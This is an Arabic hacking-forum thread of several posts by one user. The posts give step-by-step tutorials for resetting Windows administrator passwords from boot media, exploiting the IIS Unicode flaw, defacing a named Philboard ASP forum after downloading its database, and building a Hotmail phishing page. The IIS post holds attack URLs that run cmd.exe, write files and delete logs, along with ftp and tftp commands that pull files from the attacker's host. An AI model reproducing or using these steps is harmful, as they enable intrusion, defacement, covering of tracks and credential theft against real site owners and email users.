أرجو التثبيت دروس نادرة في اختراق المواقع الأميلات الشبكات و كلمة مرور الكمبيوتر1 1

Collapse
X
 
  • الوقت
  • عرض
Clear All
new posts
  • thanks_god
    موقوف
    • Jul 2004
    • 20

    #1

    أرجو التثبيت دروس نادرة في اختراق المواقع الأميلات الشبكات و كلمة مرور الكمبيوتر1 1

    اختراق الشبكات المحلية وأنظمة تشغيل شركة مايكروسوفت WinXP - 2000 - NT

    الأدوات المطلوبة:
    قرص مرن فارغ.
    قرص مدمج لأي من أنظمة التشغيل المذكورة أعلاه يكون ذاتي الإقلاع
    Bootable OS WinXp - 2000 - NT /CD
    الطريقة تنفذ عن طريق برنامج باس ويير كت وهذه نبذة عنه مع الشركة:


    Program’s Profile:
    Name: passware Kit
    Ver: 5.1 build 47 (I use this version)
    Status: shareware.
    Company: passware CO
    Website address : http://www.lostpassword.com/


    للحصول على البرنامج مع الكراك , قم بالبحث في موقع جوجل .
    قد يواجه بعضكم مشاكل في الحصول على البرنامج , وبالتالي لن يستطيع تطبيق الدرس .
    وقد أخذت ذلك بعين الاعتبار, وقمت بتجهيز الملفات اللازمة في عملية الاختراق وهي تغنيك عن البرنامج.

    يمكن للجميع تحميل الملفات (حجمها 52 كيلو بايت ) من على الرابط التالي:
    Latest news coverage, email, free stock quotes, live scores and video are just the beginning. Discover more every day at Yahoo!


    وبعد انتهاء التحميل , وفك ضغط الملف ستجد أمامك مجلد يحوي ثلاث ملفات , وما عليك سوى نسخ هذه الملفات على قرص مرن لتبدأ العمل مباشرة وتجاوز الخطوات المذكورة في الشرح المتعلقة بالبرنامج .
    بعد الانتهاء من النسخ أعد تشغيل الجهاز واجعل الإقلاع من القرص المدمج واتبع الخطوات بعدها كما في الشرح.

    ملاحظة: يمكن أن تطبق الدرس على جهازك الشخصي إذا كنت تعمل على وندوز
    2000 - XP - NT .
    كما نعلم جميعا فإن أنظمة التشغيل أعلاه تحوي حساب لمدير النظام يأتي مدمج مع تنصيب النظام.
    Built-in administrator account.
    وتتم عملية الاختراق من خلال تغيير كلمة المرور الخاصة بحساب مدير النظام المدمج.
    قبل أن أبدأ بالشرح أود أن أشير إلى نقطة يعرفها جميعكم وهي أن اسم المستخدم وكلمة السر معروفة للجميع وقامت مايكروسوفت بتعيينها افتراضيا عند الانتهاء من عملية التنصيب مباشرة وهي:
    1 - User name: administrator.
    2- Password:
    كلمة المرور هي فراغ أي لا تكتب شي واضغط زر انتر وستدخل مباشرة.
    ويقوم كثير من مدراء الشبكات بتعيين كلمة مرور أخرى ويتركون الحساب لأنهم يستخدمون حساب مدير آخر, أو أنهم يستخدمون الحساب نفسه وفي كلا الحالتين ستكون الشبكة معرضة للاختراق.

    الشركة قدمت البرنامج على أنه يعمل على استعادة كلمات السر المفقودة لكثير من البرامج ومنها أنظمة تشغيل ما يكروسوفت, وبرامج المكتب ( أوفيس ) وبرنامج ضغط الملفات
    Password recovery for XP + 2000 + NT + office applications + Zip files + etc
    ويمكن للهاكر أن يستخدمه في اختراق أي شبكة محلية, ولذلك هذه المشاركة قد تفيد كل من يعمل في شركة تحوي شبكة محلية, يعني الموظفين بشكل رئيسي, على أن يتنبهوا لهذه الطريقة إن كانوا مسئولين على الشبكة.
    Disclaimer: I won’t be held responsible for any misuse to the information that has been mentioned in this article.
    يمكن للجميع معرفة كل البرامج التي يمكن كسر كلمات المرور لها من خلال الدخول على البرنامج من شريط ابدأ. .


    بعد انتهاء عملية تنصيب البرنامج, أدخل إلى البرنامج ومنها اختر الخيار
    Windows XP - 2000 - NT key
    بعدها ستفتح أمامك النافذة الخاصة بالخيار الذي اخترته وستجد ما يلي:


    Windows XP/2000/NT Key resets Windows XP/2000/NT security settings if Administrator password, secure boot password or key disk is lost.
    This application creates Windows Key driver disk. Reboot locked system using Windows XP/2000/NT setup disks or CD-ROM and load Windows Key driver. When Windows Key driver is loaded, it will show you the list of Windows installations that could be processed.
    Please see Frequently Asked Questions (FAQ) if you need more help on using the software.
    Please insert a blank floppy disk into drive A: and click Next when ready.


    ضع القرص المرن في محرك الأقراص المرنة واضغط على كلمة
    Next
    وستظهر الشاشة التالية :


    Please fill fields below:
    User name:
    Company:
    Password: (optional)
    Click Next when ready.


    اضغط بعدها على كلمة Next. (يمكن ألا تكتب أي شي في الفراغات أعلاه وتركها كما هي )
    سيبدأ بعدها البرنامج بنسخ الملفين اللذين سنستخدمهم في تغيير كلمة المرور.
    وعندما ينتهي ستظهر هذه الشاشة :


    Reboot locked system using Windows XP/2000/NT setup disks or CD-ROM and load Windows Key driver. When Windows Key driver is loaded, it will show you the list of Windows installations that could be processed.
    Please see Frequently Asked Questions (FAQ) if you need more help on using the software.
    If you need to create another Windows Key driver disk insert a blank floppy disk into drive A: and click Next when ready.


    أغلق بعدها البرنامج نهائيا .
    بعد ذلك أعد تشغيل الجهاز وأدخل على إعدادات برنامج الإدخال والإخراج
    Bois ( basic input output system )
    واجعل خيار الإقلاع الأول من القرص المدمج ..
    ضع بعدها قرص النظام حتى يتم الإقلاع منه
    عند الدخول على أول شاشة زرقاء في برنامج الإعداد قم بالضغط على زر F6
    ستجد تعليمات في أسفل الشاشة كما يلي
    Press F6 if you want to install a third party SCSI or RAID driver .
    اترك بعدها برنامج الإعداد يعمل بشكل طبيعي.
    سيتوقف برنامج الإعداد عند الشاشة التالية:


    Windows setup
    Setup could not determine the type of one or more mass storage devices installed in your system , or you have chosen to manually specify an adapter. Currently, setup will load support for the following mass storage devices(s):
    < none >
    * To specify additional SCSI adapter, CD-ROM drivers , or special disk controllers for the use with windows XP (2000),including these for which you have a device support disk from a mass storage device manufacturer , Press S
    * If you do not have any device support disks from a mass storage device manufacturer , or do not want to specify additional mass storage devices for use with windows XP (2000),press ENTER



    عندما تجد هذه الشاشة قم بالضغط على حرف S , وستصل إلى الشاشة التالية :



    Windows setup
    Please insert the disk labeled
    Manufacturer-supplied hardware support disk into driver a:

    v Press ENTER when ready



    أدخل القرص المرن الذي قمنا بإنشائه واضغط على إنتر .
    ستظهر بعدها هذه الشاشة :


    Windows setup
    You have chosen to configure a SCSI adapter for use with windows ( 2000 - Xp) , using a device support disk provided by an adapter manufacturer
    Select the SCSI adapter you want from the following list, or press ESC to return to the previous screen.
    Windows XP - 2000 - NT key


    اضغط انتر بعدها وستجد الشاشة التالية:


    * To specify additional SCSI adapter, CD-ROM drivers, or special disk controllers for the use with windows XP (2000), including these for which you have a device support disk from a mass storage device manufacturer, Press S
    * If you do not have any device support disks from a mass storage device manufacturer , or do not want to specify additional mass storage devices for use with windows XP (2000),press ENTER



    هنا يسأل برنامج الإعداد إن كنت تريد تحديد درايفر أخر أو لا. اضغط انتر لتجاهل ذلك.

    سيستمر برنامج الإعداد بعدها بالعمل حتى يبدأ بتشغيل وندوز وستلاحظ الملاحظات أسفل الشاشة كما يلي :


    Setup is starting windows 2000


    بعد ذلك يبدأ عمل برنامج باس ويير حيث سيقوم البرنامج بالتعرف على القرص الصلب الذي يحوي نظام التشغيل وستلاحظ ما يلي:
    شاشة سوداء تحوي في الأعلى إسم البرنامج والشركة واسم مالك البرنامج مع الرخصة وفي الأسفل قراءة للقرص الصلب الذي يحوي مجلد نظام التشغيل كما يلي :


    C:\windows )if it is XP ( OR
    C:\winnt ) if it is 2000 - NT(


    ويمكن أن يقرأ أكثر من مسار إذا كنت تعمل على نظامي تشغيل.
    اكتب رقم واحد ليبدأ البرنامج بتوليد إسم مستخدم جديد يمكن لك استخدامه.
    ملاحظة: قد يكون الإسم
    Administrator
    أو أي إسم أخر لذا قم بتدوين الإسم في ورقة خارجية.
    بعدها سيقوم بتعيين كلمة مرور افتراضية هي 12345
    اضغط على الحرف Y للموافقة .
    بذلك تكون حصلت على إسم المستخدم وكلمة المرور لتدخل إلى النظام أو الشبكة بصلاحيات مطلقة كمدير ..
    سيقوم البرنامج تلقائيا بإعادة تشغيل الجهاز وعندها تكون الشبكة قد وقعت تحت يديك أو أي جهاز يحوي نظام تشغيل محمي بكلمة مرور عند بداية تسجيل الدخول. قم بالدخول بواسطة المعطيات الجديدة وستلاحظ عند نجاح تسجيل الدخول ظهور رسالة تفيد بأن كلمة المرور ستنتهي خلال 24 ساعة ويعطيك خيار تغيير كلمة المرور , وقم بذلك إذا أحببت .

    لسد الثغرة: قم بتعطيل حساب مدير النظام المدمج حتى لا يتمكن أحد من استخدامه, وأنشأ حساب مدير أخر للعمل عليه.

    وهناك نظرية أمنية يجب أن يعرفها الجميع وهي أن كل جهاز تصل إليه يديك مهما بلغت وسائل الحماية عليه يمكن اختراقه وهو ما يعرف ب
    PC physical access
    وبالعربي الفصيح " قول على الجهاز يا رحمن يا رحيم "
    ولأي استفسار عن استخدامات البرنامج يمكن لأي منكم مراسلتي على إيميلي أخر المشاركة.

    قبل أن أنهي أود أن أشير إلى حل لمشكلة يعاني منها الكثيرين عند تنصيب وندوز XP وهي الرسالة التي تفيد بأن برنامج الإعداد غير قادر على نسخ ملف معين ويطلب منك تجاوز النسخ أو إعادة المحاولة. وتحدث هذه المشكلة في الأقراص المنسوخة للنظام الغير أصلية ولتجاوز هذه المشكلة قم بتنصيب وندوز 2000 أولا ثم قم بعمل ترقية لنظام xp من النسخة الغير أصلية لديك.
    Install Win 2000 first then upgrade the system to XP.
    حيث أن ما يزيد عن 85% تقريبا من ملفات 2000 هي نفسها ملفات XP, وسيعمل النظام بشكل ممتاز ومن دون مشاكل.
  • thanks_god
    موقوف
    • Jul 2004
    • 20

    #2
    2

    أختراق المواقع و السرفرات عن طريق الاف تي ب


    يحتوى الدرس الاول على ( 13 نقطة ) وهي كما يلي :-
    - تعريف باليونيكود .
    - تاريخ ظهور هذه الثغرة .
    - كيفية ايجاد هذه الثغرات .
    - كيف يتم استغلال ثغرات اليونكود .
    - الاوامر المستخدمة بواسطة ملف CMD .
    - طريقة تطبيق هذه الثغرات .
    - كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
    - طريقة نسخ ملف الـ CMD لاتاحة امكانية الكتابة على الملفات .
    - كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
    - كيفية عمل اكاونت للدخول بواسطة الـFTP .
    - طريقة كشف باسورد الادمينستريتور .
    - تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .
    - مسح ملفات اللوق حتى لا يتم التعرف عليك .


    - تعريف باليونيكود .
    اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع IIS4.0 / IIS5.0 والذي ياتي عادة مع NT4 / Win2k .


    - تاريخ ظهور هذه الثغرة .
    لايوجد تاريخ محدد لظهور اول ثغرة لليونيكود لذا يعتبر ظهورها بواسطة شخص مجهول anonymous person ، وقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة الصينين ولكن لايوجد مايثبت صحة هذا الكلام لهذه الثغرات ، فتم استغلال هذه الثغرات من قبل المخترقين وتطوير البرامج اللازمة لها .


    - كيفية ايجاد هذه الثغرات .
    يتم ايجاد هذه الثغرات بطريقتين :-
    1- بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .
    2- بواسطة تطبيق الثغرة على الموقع مباشرة .


    - كيف يتم استغلال ثغرات اليونكود .
    عند تطبيق الثغرة على نظام الـ IIS4 / IIS5 يبدا ملف CMDبفك شفرة اليونكود في المثال الخطاء ومن هنا يتم استغلالها .


    - الاوامر المستخدمة بواسطة ملف CMD .
    الاوامر المستخدمه بواسطة ملف الـCMD وهي امر لانشاء دليل جديد وامر لالغاء دليل وامر النسخ وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أي ملف وامر لسحب أي ملف ، وهي حسب الامثلة التالية :-
    امر انشاء دليل جديد: http://www.xxxx.com/msadc/..%c0%af.....e?/c+md+c:\hEx

    امر الغاء دليل: http://www.xxxx.com/msadc/..%c0%af.....e?/c+rd+c:\hEx
    للمعلومية:لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات

    الامر المستخدم للنسخ:


    الامر المستخدم للنقل:


    الامر المستخدم للحذف: http://www.xxxx.com/msadc/..%c0%af.....del+c:\hEx.mdb

    الامر المستخدم لتغيير مسمى الملفات: http://www.xxxx.com/msadc/..%c0%af.....ex.htm+hEx.htm

    الامر المستخدم لرؤية محتويات الملف: http://www.xxxx.com/msadc/..%c0%af.....ype+c:\hEx.txt

    الامر المستخدم للكتابة داخل أي ملف:
    http://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/c+echo+sNiper_hEx+>c:\hEx.txt

    الامر المستخدم لعملية سحب أي ملف:
    عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي:



    - طريقة تطبيق هذه الثغرات .
    تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :-






    http://www.xxxx.com/scripts/..%c1%pc...cmd.exe?/c+dir +c:\
    وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-
    Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin


    - كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
    في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه الثغرة :-


    فنحتاج الى نسخ ملف w3svc.exe الى مجلد inetpub\scripts والامر يكون بهذه الطريقة :-


    بعد نسخ ملف w3svc.exe الى مجلد inetpub\scripts ، الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة :-

    الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل
    inetpub\wwwroot\index.htm بحيث يكون الامر بالشكل التالي :-
    http://www.xxxx.com/scripts/w3svc.exe?/[email protected]+>+c:\inetpub\wwwroot\index.htm


    - طريقة نسخ ملف الـCMD لاتاحة امكانية الكتابة على الملفات .
    الغرض من نسخ ملف الـCMD وهو لاعطاء امكانية للكتابة داخل السيرفر في بعض الحالات ويتم نسخه الى مجلد السيكربت بهذه الطريقة :-

    الان بامكاننا استخدام ملف الـCMD الجديد في الثغرة بدلا من الاول بهذا الشكل :-



    - كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
    تتم معرفة مشكلة الـAccess Denied من خلال المحاولة في حذف أي ملف من أي امتداد ، فعند ظهور رسالة الـ Access Denied فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر :-
    1- الطريقة الاولى نسخ ملف الـ CMD الى دليل السيكربت بمسمى CMD1 فسوف يتاح لك امكانية الكتابة باستخدام الامر Copy باستخدام هذا الامر :-

    2- الطريقة الثانية بالتعامل مع الملف ssinc.dll والطريقة كما يلي :-
    o اولا انشاء صفحة باسم test.shtml
    o تكون هذه الصفحة داخل مجلد wwwroot/hEx/test.shtml
    o كتابة هذا الكود داخل الصفحة <!--#include file="AAAA[...]AA"--> بحيث ان حرف A يتم كتابتة حتى يتعدى 2049 حرف .
    o الان يتم طلب الصفحة من خلال المتصفح http://www.xxxx.com/test.shtml
    o الان سوف تظهر لك الصفحة .
    o الان تستطيع الكتابه وتم تخطي مشكلة الـAccess Denied .
    o اذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة .
    3- الطريقة الثالثة باستخدام برنامج NC.exe بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـTemp في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال موجة الدوز وللمعلومية مجلد الـTemp مفتوح لعمليات الاب لوود .
    4- الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان .
    5- البحث عن ملفات : root.exe ،6- sensepost.exe ،7- shell.exe ،8- w3svc.exe ونسخها الى مجلد c:\inetpub\scripts وتطبيق الثغرة من خلالها .


    - كيفية عمل اكاونت للدخول بواسطة الـFTP .
    1- نسخ ملف CMD الى مجلد Scripts باسم Shell.exe حتى يتم الاستفادة من ثغرة قديمة
    /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe
    2- انشاء ملف mspft.pll بواسطة الامر Echo وكتابة فيه التالي open ftp.host.com حيث ان هذا هو الخادم للـFTP .
    /c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl
    3- الان مطلوب اضافة مجهول Anonymous الى نفس الملف الذي قمنا بانشاءه mspft.pll
    /shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl
    4- الان مطلوب ادراج البريد [email protected] الى نفس الملف الذي قمنا بانشاءه mspft.pll
    /shell.exe?/[email protected]+>>+c:\winnt\mspft.ppl
    5- إضافة User قبل Anonymous لزوم الملف الذي قمنا بانشاءه mspft.pll
    /shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl
    6- الان تكرار لحاجة الاعداد
    /shell.exe?/[email protected]+>>+c:\winnt\mspft.ppl
    7- يتم هنا ادراج الموقع الحالي للملفات
    /shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.ppl
    8- الان يكتب اوامر الـFTP اللازمة لسحب الملف من خادم الـFTP وهي Get index.htm ثم يدرج هنا بدون المسج السابق
    /shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl
    9- هنا نفس السابق ولكن باضافة Quit
    /shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl
    10- الان يتم تنفيذ امر FTP.exe?+"-s:c:winnt\mspft.ppl” وهو عبارة عن خطوات قمنا بانشاءها وموجودة في ملف mspft.ppl باحتوائها على مايلي :-
    - Open FTP.host.com
    - Anonymous
    - [email protected]
    - User Anonymous
    - [email protected]
    - Get index.html
    - Quit

    /msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl"

    - طريقة كشف باسورد الادمينستريتور .
    نحتاج الى وجود برنامجين ( Microsoft Access - L0phtCrack ) وهي لزوم تنفيذ بعض الخطوات لتالية وهي :-
    - باسورد الادمينستيتور للسيرفر يكون موجود في ملف الـ SAM._ في دليل \winnt\repair\ وافضل برنامج لفك شفرة الباسورد هو برنامج L0phtCrack كما هو موضح بالشكل التالي:-



    - اذا كان هناك مستخدمين في السيرفر ويوجد لديهم حساب فان معلوماتهم سوف تكون في ملف PASSFILT.DLL ونستطيع تحديد مسار هذا الملف من خلال الريجستري بواسطة هذا المفتاح :-
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SYSTEM32\PASSFILT.DLL

    - اذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ ASP للوصول الى البيانات من خلال قاعدة الـ MySQL فسوف نحتاج الى تطبيق ثغرة ( +.htr ) للوصول الى باسورد المسئول عن هذة القاعده وهي كالتالي :-


    عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة صحيحة وماعلينا فقط سوى سحب ملف database.inc وقراءة محتوياته للعثور على اسم المستخدم والباسورد للمسئول عن قاعدة البيانات .


    - تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .
    1- قم بانشاء صفحة وضع شعارك عليها واحفظها باسم index.htm على الـ c:\
    2- قم بتشغيل برنامج TFTP ونفذ الامر في الفقرة التالية .

    /c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm

    tftp.exe وهو البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر
    "-i" وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات
    1.1.1.1 رقم الايبي الخاص بك
    GET وهو الامر اللازم لطلب الملفات مابين الارسال والاستقبال
    index.htm اسم الملف بجهازك
    \inetpub\wwwroot\ اسم الدليل في السيرفر
    index.htm اسم الملف على السيرفر


    - مسح ملفات اللوق حتى لا يتم التعرف عليك .
    وتتم هذه العملية من خلال حذف ملفات الـ Log من مجلد System32 بواسطة الامر :-
    /c+del+c:/winnt/system32/logfiles/*.log

    انتهى ،،، [email protected]

    تعليق

    • thanks_god
      موقوف
      • Jul 2004
      • 20

      #3
      Aspأختراق منتديات أ س ب

      سأذكر احد الثغرات في بعض اللغات الديناميكية(asp) active server pages
      وعليها فقس
      طبعا هذه اللغة وللأسف بها ثغرات قوية جدا وخصوصا في التعامل مع قواعد بياناتها .

      بشكل مختصر هذه اللغة تعتبر من لغات البرمجة الديناميكية التفاعلية لبرمجة مواقع الانترنت ولها ميزة بأن الكود لها مخفي والكثير من الناس يفضلونها لانها مدعومة من ما يكروسوفت على عكس وجهة نظري لاني ما أطيق اي برنامج من ما يكروسوفت الا اذا لم يوجد له بديل ...الخ
      وتعتمد قواعد بياناتها على ثلاثة أنواع هي :
      sqlserver && sql && M.S Access

      واما قاعدة بيانات ما يكروسوفت أكسس فثغراتها من أبسط الثغرات بحيث انك اذا وجدت امتدادا واسم قاعدة البانات فقط فانك تستطيع تحميلها على جهازك مباشرة وتصفح جميع الباسوردات بسهولة ويسر وبدون تشفير أيضا .

      واليكم المثال من أحد المنتديات التي تتضح جليه بها هذه الثغرة وهي باسم philboard.asp
      مثل هذا المنتدى http://www.khill.co.uk/forum/philboard.asp
      وطريقة ايجاد مثل هذا النوع منتديات اذهب الى جوجل كما ذكرنا سابقا وابحث عن -------------- > philboard وانتظر النتائج ....

      -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      كيف تحمل قاعدة البيانات ؟
      اكتب هذا الامتداد
      وبعد ذلك حاول ان يكون المنتدى به عديد قليل من المواضيع حتى يكون حجم قاعدة البيانات صغير جدا للتطبيق والتسليم بسرعة
      وهذا هو امتداد واسم قاعدة البيانات لقاعدة البيانات
      database/philboard.mdb
      وتكتبه بعد اسم الموقع والمنتدى مثل


      ولا بد لكي تقرا قاعدة البيانات ان يكون في جهازك برنامج ما يكروسوفت أكسس
      وبعد فتح قاعدة البيانات ستجد بداخلها عدة جداول فيها جميع محتويات قاعدة البيانات
      من ضمنها وهو المهم جدول المستخدمين ال users
      وستجد اول اسم عالبا هو admin وهو اسم المدير العام مع الباسوورد

      ا
      ل
      ا
      ن وبعد ان حصلنا على الاسم والباسوورد ماذا تبقى ؟
      لم يبقى الى الدخول للوحة التحكم للمنتدى للتحكم فيه وكأنك المشرف العام

      philboard_admin.asp وهذا عنوانها
      مثال


      ادخل وستجد كل منتدى وبجانبة كلمه delete و edit
      احذف كل المنتديات وأنشا منتديات جديدة واكتب عليها
      hacked by xxxxxxxxxx
      xxxxxxx يعني اسمك ,,,

      من وين ؟

      من المربعين الموجودة بالاسفل في لوحة التحكم
      اكتب في المستطيل hacked by xxxxxxxxxx
      وفي المربع الي اسفله ضع رسالة تود توجيهها لاصحاب الموقع
      واضغط add يعني اضافة

      ومبرووووووووووووووووووووووووووووووووك ألف مبرووووووووووك اول اختراق لك

      والحل لهذه الثغرة / هو تغيير مسار قواعد
      البيانات لكل منتدى او تغيير اسمها . فكما راينا ان منتديات philboard.asp قواعد بياناتها جميعا لها نفس الاسم والامتداد

      تعليق

      • thanks_god
        موقوف
        • Jul 2004
        • 20

        #4
        معرفة كلمة سر المسؤول

        وهي عملية سهلة جدا ا ذ يكفي تحميل, Advanced Windows Password recovery
        و لتحميله يكفي البحث عليه في قوقل مع العلم أن استعماله سهل جدا.
        [email protected]

        تعليق

        • thanks_god
          موقوف
          • Jul 2004
          • 20

          #5
          لاختراق E-mail في الـHotmail

          بسم الله الرحمن الرحيم ...

          اهلا بكم اخواني الاعزاء واهلا بكل من يريد طريقة حديثة لاختراق الهوتميل ومجربة ومضمونة وسوف تتأكدون من ذلك بأنفسكم

          مقدمة عن hotmail :
          ======================================
          من المعروف ان Hotmail من افضل المواقع المقدمة للبريد الإلكتروني وذلك لما يتوفر فيه من حجم كبير وحماية عالية لكن مع ذلك وجدت سكربتات واكواد تكتب بلغة Java تستطيع من خلالها قراءة رسائل الشخص وقد استخدم هذا الكود ليطور إلى برنامج المسمى بـhoboo اكثركم سوف يطلب مني البرنامج لكني سوف أرد وأقول قد فات الأوان لاستخدام هذا البرنامج المعروف بتصفح أي إيميل ترغبه ولكن طبعا من دون معرفة الرقم السري ومن دون التحكم بخيارات
          الحذف - الانتقال ..
          وظهرت أيضا برامج تقوم بإنشاء صفحة ملغومة بإحدى الباتشات ويمكنك تجزيئها باستعراض Source الخاص بالصفحة ثم الذهاب إلى أي إيميل يمكنه إرسال الرسائل مع استخدام خاصية html view source الموجودة في Yahoo وقد تنجح الطريقة فقط مع المتصفح IE5.0
          وظهرت أيضا طريقة الصفحة المزورة للهوتميل وهي مصممة بالـphp ولاكن لاتجدي لسبب واحد وهو انها سوف تعرض الباسوورد بعد كتابته ولاتضعه تحت وضع التشفير المعروف بالنجوم والدوائر في win xp
          ولكن هذا لايجدي الآن ولأعرفكم على أحدث طريقة لاختراق إيميل على hotmail
          ======================================

          هذه الطريقة تعتمد على بناء صفحة إعادة تسجل دخول إلى الإيميل ولكن هذه المرة بخطة ذكية ولايمكن كشفها بسهولة واقولها بصدق تمكنت من اقتحام إيميلات كثيرة بهذه الطريقة الحديثة والتي تعتمد على برنامج صغير الحجم كبير في فعله

          وانا اعلمكم اول شي لتأمنوا نفسكم من أي رسالة سوف تأتيك بنفس السياق الذي اذكره
          وثاني شي لكي تستفيدوا من الطريقة وأتمنى كل خير للجميع

          كثر الحديث صح ولم نبدأ بالمهم
          ok

          هذا البرنامج هو Hotmail Hacker والذي سوف يقوم بالمهمة

          ملاحظة بسيطة:
          ------------------------------------------------
          الكثير منكم وضع البرنامج وللأسف لم يستطيع شرحه ولم يستطيع ايضا فهمه وكثير من الاعضاء لم يهتم له ابدا ...
          ولكني حطيت هذا الموضوع لكي اشرح تفصيليا كيف تستفيد من برنامج صناعة صفحات تسجيل الدخول
          ------------------------------------------------

          كثيرا رأيتموه صح !!
          لكن هل اجدتم استخدامه ؟
          -(أغلبكم لم يحسن التعامل مع هذا البرنامج)-

          =][الشرح][=
          ------------------------------------------------------
          :Your User Name -(إيميلك الي تبي ينرسل له المعلومات)-
          مثال/[email protected]

          :Their Sign-In Name -(إيميل الضحية في الهوتميل لاتضع إلا الاسم)-
          مثال/mobman

          : Domain Name -(الإيميل الي مستضاف لديه إيميل الضحية)-

          :Site You Want Them Redirected To -(عنوان الصفحة الي يتوجه لها الضحية يعني بعد مايكتب Pass حقه ويضغط على Sign in
          تبغاه يتوجه لأي صفحة اكتب أي صفحة وأنا راح أكتب مثلا www.hotmail.com

          ألحين ولما تخلص من كل الإعدادات اضغط على
          Creat The File
          ------------------------------------------------------

          بعد ماطبقت الشرح ونفذت الصفحة المزورة والتي تطالب بإعادة تسجيل الدخول اختبرها (استعرضها)
          وهذي صورة الصفحة الي انا سويتها طبقا للشرح



          وألحين حاولوا تحطون أي باسوورد مزيف واضغطوا Enter إدخال
          أو Sign in
          بعد كذا راح يحولكم للصفحة الي حطيتوها في البرنامج ..

          ألحين كل شي كويس وإنت جهزت الصفحة ok ماباقي إلا تقوم بالخطة طبعا اسم الصفحة الي انشأتها راح يكون إيميل الضحية وكذا راح يؤدي إلى شكوك حاول تغيره وتخليه أي اسم يوهم الضحية ويجعل الضحية بفتحه

          الحين كيف نقوم بالخطة

          بسيطة أرسل للضحية هذي الصفحة على ملف مرفق ولاترفعها إلى أحد المواقع وتعطيه اللينك حق الصفحة هذا خطأ !!!
          وبكذا ماراح تقدر تحصل على الباسوورد حتى لو الضحية كتبه
          فهمتني ..@

          ألحين نرسل هذا الملف كملف مرفق Attach وعاد إنت وخبرتك في كتابة الرسالة واستخدم أي برنامج Anonymous لإرسال رسالة مجهولة من مصدر مجهول وأكيد من إيميل مجهول أهم شي إنك ترسل الملف المرفق

          إنت أرسلت الملف المرفق ماباقي إلا الضحية يفتحه أوكي لما يفتحه الضحية وش بيصير راح تجيه صفحة إعادة تسجيل الدخول وبعد مايكتب الباسوورد راح يتم تحويله إلى الموقع الذي تم اختياره من قبلك

          ألحين الباسوورد يوصلك على Junk Mail وليس Inbox افهم !

          وهذي إحدى الإيميلات الذي تم اختراقه بهذه الطريقة وبهذ الشكل توصلك الرسال على Junk
          تحمل عنوان:Password Recieved
          تتضمن
          -----------------------------------------------------------------------
          ### Here's an email that YOU requested, with information
          ### from YOUR website visitor, sent to you using the
          ### FREE Response-O-Matic service from Webmasters.org!


          # *** WHY CAN'T I GET TECH SUPPORT? ***
          # Do you struggle to find superior technical support, or even
          # to receive simple answers from your Web hosting company?
          # Wouldn't you LOVE to have an answer from them in LESS than an HOUR?
          # You can have the level of service you deserve! Take a look NOW!!



          __________________________________________________
          _________

          Your Response-O-Matic form is below this important message:
          __________________________________________________
          _________

          This form submission does not have a Return Address
          supplied by your web site visitor.

          DO NOT CLICK REPLY TO ANSWER THIS EMAIL

          Your reply will go to you, and NOT to the person who
          submitted the form.

          You can fix your form to correctly get your visitor's
          email address. For details, go to:

          __________________________________________________
          ________



          A visitor to your website submitted this information from your form at:

          ==================================================
          ==========================

          Date: Sunday, December 29, 2002
          Time: 3:19 PM EST

          Subject: Password Recieved


          domain: hotmail.com

          passwd: fghg46g4h6g4g6hhg

          enter: Sign in

          curmbox: F000000001

          login: mobman

          ishotmail: 1

          reauth: yes

          sec: no

          _lang: EN

          js: yes

          id: 2

          fs: 1

          cb: _lang%3dEN

          ct: 1028353186

          ru:


          svc: mail

          ==================================================
          ==========================
          # ONLINE SHOPPING CARTS ARE AFFORDABLE AND EASY TO SETUP!
